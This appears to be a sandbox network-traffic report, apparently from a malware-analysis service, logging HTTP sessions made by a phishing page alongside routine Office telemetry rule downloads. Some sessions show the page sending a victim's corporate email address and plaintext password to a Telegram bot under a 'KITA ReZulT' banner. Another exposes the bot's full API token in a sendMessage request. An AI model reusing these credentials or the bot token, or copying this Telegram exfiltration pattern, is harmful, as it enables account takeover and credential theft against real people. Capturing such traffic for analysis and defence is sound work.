                                                          2024-12-03 02:27:40 UTC681OUTData Raw: 63 68 61 74 5f 69 64 3d 31 37 33 39 32 36 39 34 33 34 26 74 65 78 74 3d 2d 2d 2d 2d 2d 2d 2d 2d 25 32 42 2b 4b 49 54 41 2b 52 65 5a 75 6c 54 2b 4e 65 77 2b 59 6f 72 6b 2b 43 69 74 79 2b 4e 65 77 2b 59 6f 72 6b 25 32 43 2b 55 53 2b 25 32 42 2d 2d 2d 2d 2d 2d 2d 2d 25 30 41 45 6d 61 69 6c 2b 25 33 41 2b 74 61 65 6b 79 75 2e 6b 69 6d 25 34 30 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 25 30 41 50 61 73 73 77 6f 72 64 2b 25 33 41 2b 61 32 25 35 42 61 48 5a 25 34 30 25 33 46 38 49 25 35 42 2a 72 42 25 33 45 71 67 25 30 41 43 68 65 63 6b 65 72 25 33 41 2b 74 61 65 6b 79 75 2e 6b 69 6d 25 34 30 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 25 33 41 61 32 25 35 42 61 48 5a 25 34 30 25 33 46 38 49 25 35 42 2a 72 42 25 33 45 71 67 25 30 41
                                                          Data Ascii: chat_id=1739269434&text=--------%2B+KITA+ReZulT+New+York+City+New+York%2C+US+%2B--------%0AEmail+%3A+taekyu.kim%40hyundaielevator.com%0APassword+%3A+a2%5BaHZ%40%3F8I%5B*rB%3Eqg%0AChecker%3A+taekyu.kim%40hyundaielevator.com%3Aa2%5BaHZ%40%3F8I%5B*rB%3Eqg%0A
                                                          2024-12-03 02:27:41 UTC389INHTTP/1.1 200 OK
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 03 Dec 2024 02:27:41 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 1040
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-12-03 02:27:41 UTC1040INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 33 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 35 31 33 30 38 31 33 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 67 62 69 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 70 69 73 61 70 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 33 39 32 36 39 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6f 72 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 5f 6d 6f 6f 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 31 39 32 38 36 31 2c 22 74 65 78 74 22 3a 22 2d 2d 2d
                                                          Data Ascii: {"ok":true,"result":{"message_id":19363,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1733192861,"text":"---


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          24192.168.2.44977413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:41 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:41 UTC471INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:41 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 218853
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public
                                                          Last-Modified: Fri, 29 Nov 2024 23:15:49 GMT
                                                          ETag: "0x8DD10CBC2E3B852"
                                                          x-ms-request-id: 82d9e4b2-501e-007b-3a87-435ba2000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022741Z-174f7845968cdxdrhC1EWRg0en000000159g000000007x9q
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:41 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                          2024-12-03 02:27:41 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                          Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                          2024-12-03 02:27:41 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                          Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                          2024-12-03 02:27:42 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                          Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                          2024-12-03 02:27:42 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                          Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                          2024-12-03 02:27:42 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                          Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                          2024-12-03 02:27:42 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                          Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                          2024-12-03 02:27:42 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                          Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                          2024-12-03 02:27:42 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                          2024-12-03 02:27:42 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                          Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.449777149.154.167.220443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:42 UTC401OUTGET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1
                                                          Host: api.telegram.org
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:43 UTC346INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 03 Dec 2024 02:27:43 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 80
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-12-03 02:27:43 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                                          Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          26192.168.2.44977913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:44 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:44 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:44 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 450
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                          ETag: "0x8DC582BD4C869AE"
                                                          x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022744Z-174f78459688l8rvhC1EWRtzr00000000hxg000000008g0n
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:44 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          27192.168.2.44977813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:44 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:44 UTC494INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:44 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 3788
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                          ETag: "0x8DC582BAC2126A6"
                                                          x-ms-request-id: f1bb428e-201e-005d-6860-43afb3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022744Z-174f7845968xlwnmhC1EWR0sv8000000150g00000000pe6x
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:44 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          28192.168.2.44978113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:44 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:44 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:44 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 408
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                          ETag: "0x8DC582BB56D3AFB"
                                                          x-ms-request-id: 2c78b3d6-001e-0017-21e0-430c3c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022744Z-174f7845968ljs8phC1EWRe6en000000157g000000002wq5
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:27:44 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          29192.168.2.44978013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:44 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:27:44 UTC494INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:44 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 2980
